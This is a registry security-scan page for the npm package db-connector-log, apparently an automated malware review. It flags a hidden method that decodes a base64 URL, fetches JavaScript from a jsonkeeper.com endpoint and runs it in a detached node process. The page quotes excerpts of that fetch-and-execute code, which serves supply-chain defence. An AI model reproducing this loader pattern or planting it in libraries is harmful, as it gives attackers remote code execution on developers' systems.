registry  /  db-connector-log  /  1.0.1

db-connector-log@1.0.1

A database connector class that simplifies connections and queries to a database for nodejs apps

AI Security Review

scanned 3d ago · by lpm-firewall-ai

The package exposes a database connector class with an extra method that fetches a remote payload and runs it in a detached Node process. This creates user-triggered remote code execution outside the package's stated database connector purpose.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
Runtime call to `queryDBConnect()` on the exported class
Impact
Arbitrary remote code can run in the consuming project environment with the caller's privileges.
Mechanism
fetch remote JavaScript and execute via detached `node` stdin
Attack narrative
When a consumer imports the main entrypoint and calls `queryDBConnect()`, index.js decodes a base64 URL, requests `https://jsonkeeper.com/b/SH5ZW`, extracts `.data.session`, starts a detached `node` process, and writes that remote content to the child process stdin. This is not package-aligned with a MySQL connector and enables arbitrary remotely controlled code execution.
Rationale
Direct source inspection confirms a hidden, package-misaligned remote payload execution path in index.js. Although not install-time, the exported runtime method is concrete malicious behavior suitable for blocking.
Evidence
package.jsonindex.jstest.js
Network endpoints1
jsonkeeper.com/b/SH5ZW

Decision evidence

public snapshot
AI called this Malicious at 97.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js imports axios and child_process.spawn at package entrypoint.
  • index.js queryDBConnect decodes base64 URL and GETs remote data.session.
  • index.js queryDBConnect spawns detached `node` with stdio pipe and writes remote `session` into stdin.
  • Remote code execution helper is unrelated to normal MySQL connector behavior.
  • package.json declares main index.js and no lifecycle hooks.
Evidence against
  • No install-time lifecycle script in package.json.
  • Malicious behavior is method-triggered, not automatic on import.
  • Other connector methods perform expected mysql pool/query/transaction operations.
Behavioral surface
Source
ChildProcessEnvironmentVarsNetwork
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 19.2 KB of source

Source & flagged code

4 flagged · loading source
index.jsView file
2const util = require("util"); L3: const axios = require("axios"); L4: const { spawn } = require("child_process"); L5: /** ... L28: "ssl": { L29: ca: "Contents of __dirname + '/certs/ca.pem'", L30: key: "Contents of __dirname + '/certs/client-key.pem'", ... L270: const HASH_KEY = "[redacted]"; L271: const s1 = (await axios.get(atob(HASH_KEY))).data.session; L272: ... L276: }); L277: child.stdin.write(s1);
Critical
Spawned Remote Code Execution

Source spawns a local helper that fetches and dynamically executes remote code.

index.jsView on unpkg · L2
2Trigger-reachable chain: manifest.main -> index.js L2: const util = require("util"); L3: const axios = require("axios"); L4: const { spawn } = require("child_process"); L5: /** ... L28: "ssl": { L29: ca: "Contents of __dirname + '/certs/ca.pem'", L30: key: "Contents of __dirname + '/certs/client-key.pem'", ... L270: const HASH_KEY = "[redacted]"; L271: const s1 = (await axios.get(atob(HASH_KEY))).data.session; L272: ... L276: }); L277: child.stdin.write(s1);
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.jsView on unpkg · L2
3const axios = require("axios"); L4: const { spawn } = require("child_process"); L5: /**
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L3
2const util = require("util"); L3: const axios = require("axios"); L4: const { spawn } = require("child_process"); L5: /** ... L28: "ssl": { L29: ca: "Contents of __dirname + '/certs/ca.pem'", L30: key: "Contents of __dirname + '/certs/client-key.pem'", ... L270: const HASH_KEY = "[redacted]"; L271: const s1 = (await axios.get(atob(HASH_KEY))).data.session; L272: ... L276: }); L277: child.stdin.write(s1);
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

index.jsView on unpkg · L2

Findings

2 Critical2 High3 Medium2 Low
CriticalSpawned Remote Code Executionindex.js
CriticalTrigger Reachable Dangerous Capabilityindex.js
HighChild Processindex.js
HighBase64 Obscured Urlindex.js
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowHigh Entropy Strings